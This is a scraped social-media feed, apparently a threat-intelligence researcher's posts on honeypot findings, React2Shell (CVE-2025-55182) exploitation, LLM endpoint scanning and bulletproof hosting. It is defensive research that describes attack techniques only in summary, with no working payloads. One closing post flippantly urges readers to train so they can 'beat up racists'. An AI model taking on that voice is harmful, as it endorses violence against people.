(saw this in RSS) I've had various Ollama models write CLAUDE[.]md and skills, and also had minimax m2.1 (which is just amaze) do it and they're all pretty good at it.

The infrastructure ties back to established CVE exploitation operations.

h/t to Defused for their report as well: xcancel.com/DefusedC...

www.greynoise.io/blo...
2/2

Threat Actors Actively Targeting LLMs Our Ollama honeypot infrastructure captured 91,403 attack sessions between October 2025 and January 2026. Buried in that data: two distinct campaigns that reveal how threat actors are systematically mapping the expanding surface area of AI deployments.

New research: Threat actors are actively mapping LLM infrastructure.

Our Ollama honeypots captured 91K+ attack sessions. One campaign systematically probed 73+ model endpoints—GPT-4o, Claude, Llama, Gemini, and more—across 80K sessions in 11 days.

www.greynoise.io/blo...
1/2

If your systems were hit during this window, the vulnerability data may already be for sale.

Links to IoCs are in the post.
4/4

* The IAB Model: This wasn't a direct hit; it was a "restocking" of the Initial Access Broker market.
* Infrastructure: The activity originated from a suspicious hosting provider (CTG Server Limited) with a history of phishing and abuse.
3/4

A single operator systematically scanned the internet, testing 240+ different exploits to build a fresh inventory for 2026 ransomware attacks.

Key Takeaways:

* Timing is everything: Attackers used the holiday skeleton crew window to scan unimpeded for 4 days.
2/4

The Ransomware Ground Game: How A Christmas Scanning Campaign Will Fuel 2026 Attacks Over four days in December, one operator scanned the internet with 240+ exploits, logging confirmed vulnerabilities that could power targeted intrusions in 2026.

That which was originally a private customer threat intel share in our weekly At The Edge reports is now a public blog post!

www.greynoise.io/blo...

This is a deep dive into a massive reconnaissance campaign that unfolded between December 25–28.
1/4

#macOS folks!!

Today is a *great* day to:

```bash
brew update && brew upgrade && brew cleanup && brew doctor
```

then:

```bash
brew bundle dump --file=~/Brewfile --describe --force
```

to create a `Brewfile` you can use to "quickly" restore the Homebrew bits that you rely on.

archive.ph/cPlPK

I ran it when I got to #2.1/#2.2's house and hopefully the networks you visit will be equally as clean.

Lifehacker does a bang-up job explaining it, too.

NPR has some more background on this new type of consumer exposure, too.

www.npr.org/2025/11/...
2/2

GreyNoise Check all green!

🙏🏽 Lifehacker for introducing GreyNoise Check to a broader population!

👉 lifehacker.com/tech/...

If you haven't used GreyNoise Check — check.labs.greynoise.io — this is the perfect time to do so, especially if you're visiting friends/fam over the holidays.
1/2

React2Shell Payload Analysis: A Look at Selected Opportunistic and Possibly AI-"Enhanced" Probes and Attacks Over the past ~1.5 weeks, the React2Shell campaign has unleashed a flood of exploitation attempts targeting vulnerable React Server Components. Analyzing the payload size distribution across these attacks reveals a clear fingerprint of modern cybercrime, and a landscape dominated by automated scanners with a handful of sophisticated outliers.

I also took the opportunity to make fun of some very incompetent attackers.

Hey, if they can attack, so can I!

www.greynoise.io/blo...
3/3

We've captured over 50K (some, barely) "unique" #React2Shell payloads, and a few caught our eye as potentially being some of the more nascent "AI"-created or enhanced ones.

We took the opportunity to dig into five of them and see what makes them tick.

2/3

React2Shell Payload Analysis: A Look at Selected Opportunistic and Possibly AI-"Enhanced" Probes and Attacks Over the past ~1.5 weeks, the React2Shell campaign has unleashed a flood of exploitation attempts targeting vulnerable React Server Components. Analyzing the payload size distribution across these attacks reveals a clear fingerprint of modern cybercrime, and a landscape dominated by automated scanners with a handful of sophisticated outliers.

"There's Payloads, And Then There's pAIloads: A Look At Selected Opportunistic (And Possibly AI-"Enhanced") React2Shell Probes and Attacks"

www.greynoise.io/blo...
1/3

Just in: Watch #React2Shell exploitation unfold over time in the map below (geo of source IPs attempting to exploit CVE-2025-55182).

#GreyNoise #ThreatIntel #CVE202555182 #Nextjs #Cybersecurity

React2Shell Side Quest: Tracking Down Malicious MeshCentral Nodes – GreyNoise Labs While spelunking through React2Shell initial access payloads, MeshCentral entered the building, so we decided to see just how Mesh-y GreyNoise Data Is

Whilst spelunking through React2Shell traffic and associated initial access payloads, I came across a late-to-the party attacker attempting to deploy a MeshCentral agent for C2. Thanks to Censys, we poked a bit harder, and boy howdy are we on the precipice of a real mes[hs].

This is textbook opportunistic exploitation—not novel, but serious. These campaigns lead to credential theft, cryptomining, ransomware staging, & access brokering.

Patch if you haven't. DO NOT RELY ON WAFs ALONE.

Block IPs using GN feeds & monitor for IoCs in the post.
3/3

What we're seeing:

Automation-heavy traffic (Go clients, scanner UAs)

PoE validation via PowerShell math commands

Encoded stagers downloading secondary payloads

AMSI bypass attempts via reflection

~50% of IPs first seen in December 2025

Early migration into Mirai botnets
2/3

CVE-2025-55182 (React2Shell) Opportunistic Exploitation In The Wild: What The GreyNoise Observation Grid Is Seeing So Far GreyNoise is already seeing opportunistic, largely automated exploitation attempts consistent with the newly disclosed React Server Components (RSC) “Flight” protocol RCE—often referred to publicly as “React2Shell” and tracked as CVE-2025-55182.

I had the [mis?]fortune of being awake just as attackers decided to slam the public internet with React2Shell exploits. GreyNoise had a tag up for it yesterday afternoon.

Full write-up of the initial spate of attacks:
www.greynoise.io/blo...
1/3

Holiday cyber scams are getting more inventive Hackers are hoping to take advantage of the holiday season, and they're not just stealing money or data.

Got 30s of public media "fame" on NPR yesterday www.npr.org/2025/11/28/n...

GreyNoise IP Check Check if your IP address has been observed by GreyNoise sensors. Instantly detect malicious activity, compromised devices, and security threats affecting your network.

Perfect for holiday tech support season—check your relatives' networks in 30 seconds instead of doing the awkward "let me look at your computer" thing.

For devs: `curl -s check.labs.greynoise...` returns JSON. No auth, no limits.

Full story: www.greynoise.io/blo...
3/3

GreyNoise IP Check Check if your IP address has been observed by GreyNoise sensors. Instantly detect malicious activity, compromised devices, and security threats affecting your network.

Our Labs team built a free tool to check: visit check.labs.greynoise.io and see instantly if your IP has been caught scanning the internet.

No signup. No email harvesting. Just answers from our global sensor network that sees billions of IPs.
2/3

🔍 New tool alert: GreyNoise IP Check

Your home network might be compromised and you'd never know. Residential proxies, IoT botnets, and router malware are everywhere—turning regular internet connections into attack infrastructure.
1/3

¹ I apologize for anyone who ended up with tea on their keyboards after reading that word when associated with the EU.
5/5

The Stark Industries Shell Game - When Bulletproof Hosting Proves Bulletproof EU sanctions hit Stark Industries in May 2025. GreyNoise data shows how the group quietly rebranded to THE.Hosting and kept its malicious infrastructure running.

While others look through "legal documents" we got receipts right from the network packets. You can read the whole thing @ "When Bulletproof Hosting Proves Bulletproof: The Stark Industries Shell Game"

👉 www.greynoise.io/blo...
4/5

As a result, Stark did a series of stunningly adroit "business", organizational, & network infrastructure moves that not only let them completely avoid punishment, but also come back even stronger and more dangerous than they were before.
3/5

Back in May, the EU decided to wield its mighty¹ fist & drop some sanctions on Stark. Except…they (the EU) suck @ OPSEC & the impending sanctions leaked.
2/5

Line graph showing IP activity from two bulletproof hosting providers from July to November. Orange line represents PQ Hosting (AS44477) peaking at 1,600 IPs in early September before declining to near zero by November. Blue line shows THE.Hosting/WorkTitans (AS209847) remaining low until late September, then spiking to over 1,000 IPs in November as PQ Hosting activity ceased, illustrating the migration of malicious operations between hosting providers.

There once was an organization called Stark Industries (no, not *that* one! this one is real!).

They emerged around the time Russia decided to invade Ukraine. Oddly enough, their ASN real estate was the source of scads of Russian state-sponsored cyber ops.
1/5

Good morning.

This is your reminder to get to the gym so that you can beat up racists if you have to.

The protocol is cool.

Relying on Bluesky for storage, authentication, etc. is stupid.

Really, really, really, really stupid,.